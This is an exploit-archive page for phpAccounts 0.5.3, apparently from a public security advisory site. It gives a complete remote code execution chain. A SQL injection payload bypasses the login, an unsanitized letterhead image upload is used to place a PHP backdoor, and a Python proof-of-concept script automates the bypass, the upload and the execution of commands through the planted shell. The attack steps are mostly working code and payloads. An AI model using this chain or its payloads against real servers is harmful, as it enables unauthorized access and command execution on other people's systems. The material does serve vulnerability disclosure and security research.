phpAccounts 0.5.3 SQL Injection

phpAccounts 0.5.3 SQL Injection: Posted Jun 9, 2012; Authored by loneferret; phpAccounts version 0.5.3 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 30cdfeba324743b1bf4c4c95682a87039a6577116abd1abe95054f052c5f2cf5; Download | Favorite | View

phpAccounts 0.5.3 SQL Injection

######################################################################################
# Exploit phpAcounts v.0.5.3 SQL Injection
# Date: June 6nd 2012
# Author: loneferret
# Version: 0.5.3
# Vendor Url: http://phpaccounts.com/
# Tested on: Ubuntu Server 11.10
######################################################################################
# Discovered by: loneferret
######################################################################################
 
# Old app, still fun.
 
Auth. Bypass:
http://<server>/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>
 
Upload php shell in preferences
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences
 
Acess shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>
 
 
 
---- Python PoC ---------
 
#!/usr/bin/python
 
import re, mechanize
import urllib, sys
 
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
 
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)
 
rhost = sys.argv[1]
rcmd = sys.argv[2]
 
 
print "[*] Bypassing Login ."
try:
        br = mechanize.Browser()
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
        assert br.viewing_html()
        br.select_form(name="loginForm")
        br.select_form(nr=0)
        br.form['Login_Username'] = "x' or '1'#"
        br.form['Login_Password'] = "pwnd"
        print "[*] Triggering SQLi .."
        br.submit()
except:
        print "[*] Oups..Something happened"
        exit(0)
 
print "[*] Uploading Shell ..."
try:
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
        assert br.viewing_html()
        br.select_form(nr=0)
        br.form["Preferences[LETTER_HEADER]"] = 'test'
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
        br.submit(nr=2)
except:
        print "[*] Upload didn't work"
        exit(0)
 
print "[*] Command Executed\n"
try:
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
        print shell.read()
except:
        print "[*] Oups."
        exit(0)

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

phpAccounts 0.5.3 SQL Injection

phpAccounts 0.5.3 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpAccounts 0.5.3 SQL Injection

Share This

phpAccounts 0.5.3 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems